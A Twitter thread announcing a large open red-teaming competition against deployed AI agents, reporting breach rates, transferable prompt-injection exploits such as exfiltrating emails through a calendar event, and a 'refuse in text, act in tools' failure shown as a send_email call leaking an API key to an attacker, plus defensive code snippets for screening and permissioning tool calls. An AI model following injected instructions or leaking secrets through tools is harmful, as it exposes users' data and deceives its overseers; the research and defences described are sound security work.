Andy Zou
Jul 29 · 10 tweets · 3 min read
We deployed 44 AI agents and offered the internet $170K to attack them.

1.8M attempts, 62K breaches, including data leakage and financial loss.

🚨 Concerningly, the same exploits transfer to live production agents… (example: exfiltrating emails through a calendar event) 🧵
Huge thanks to @AISecurityInst, OpenAI, Anthropic, and Google DeepMind for sponsoring, and to the UK and US AISIs for judging. The competition was held in the @GraySwanAI Arena.

This was the largest open red‑teaming study of AI agents to date.

Paper: arxiv.org/abs/2507.20526
We deployed agents across real tasks (shopping, travel, healthcare, coding, support) with “must‑not‑break” policies: company rules, platform terms, and industry regulations.
The most secure model still had a 1.5% attack success rate (ASR).

Implication: without additional mitigations, your AI application can be compromised within minutes.
We curated the strongest, reproducible breaks into the ART benchmark: a stress test with near-100% ASR across the models we tried. We'll be open-sourcing the evaluation and a subset of the attacks for research purposes, in addition to a private leaderboard.
Many breaks are universal and transferable.

Copy‑paste patterns worked across tasks, models, and guardrails. If it breaks one agent today, it likely breaks yours.
Favorite failure: “refuse in text, act in tools.” 😈

Model: “I can’t share credentials.”
Then: send_email(to=attacker, body="API_KEY=****")

The UI looks safe; the tool layer does the damage.
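One mitigation this failure mode suggests is to inspect the tool layer directly, rather than trusting the model's text-channel refusal. Below is a minimal sketch (not from the paper; `screen_tool_call` and the credential patterns are illustrative assumptions) of screening a tool call's arguments for secret-like strings before execution:

```python
import re

# Illustrative credential patterns; a real deployment would use a
# secrets scanner tuned to its own key formats.
SECRET_PATTERNS = [
    re.compile(r"API_KEY\s*=\s*\S+"),
    re.compile(r"(?i)bearer\s+[A-Za-z0-9._-]{10,}"),
]

def screen_tool_call(tool_name: str, arguments: dict) -> bool:
    """Return True if the call may proceed, False if any argument
    appears to leak a secret. The model's textual refusal is ignored;
    only the tool layer is inspected."""
    for value in arguments.values():
        if any(p.search(str(value)) for p in SECRET_PATTERNS):
            return False
    return True

# The thread's failure mode: refusal in text, leak via send_email.
print(screen_tool_call("send_email",
                       {"to": "attacker@example.com",
                        "body": "API_KEY=sk-12345"}))  # False: blocked
```

The point of the sketch is where the check lives: at the boundary where tool calls execute, so a "refuse in text, act in tools" agent is still caught.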
Can't we just patch?

History of jailbreaks says it’s whack‑a‑mole. Prompt‑only fixes don’t hold. Durable defenses require permissioned tools, policy‑aware training, and monitoring.
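"Permissioned tools" can be sketched as a deny-by-default policy enforced outside the model. The policy object and `authorize` helper below are hypothetical names, assuming a simple allowlist over tools and email recipient domains:

```python
from dataclasses import dataclass, field

@dataclass
class ToolPolicy:
    # Deny-by-default: only listed tools and recipient domains pass.
    allowed_tools: set = field(default_factory=set)
    allowed_email_domains: set = field(default_factory=set)

def authorize(policy: ToolPolicy, tool: str, args: dict) -> bool:
    """Enforce the policy regardless of what the model 'intends'."""
    if tool not in policy.allowed_tools:
        return False
    if tool == "send_email":
        domain = args.get("to", "").rsplit("@", 1)[-1]
        return domain in policy.allowed_email_domains
    return True

policy = ToolPolicy(allowed_tools={"send_email", "search_docs"},
                    allowed_email_domains={"company.com"})

print(authorize(policy, "send_email", {"to": "bob@company.com"}))  # True
print(authorize(policy, "send_email", {"to": "x@attacker.net"}))   # False
print(authorize(policy, "delete_records", {}))                     # False
```

Because the check runs outside the model, a prompt injection that flips the model's behavior cannot widen the permission set; only the policy owner can.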
The upshot?

Prompt‑injection risks appear to be a primary blocker to safe autonomous deployment. Treat AI agents like untrusted code touching live systems.
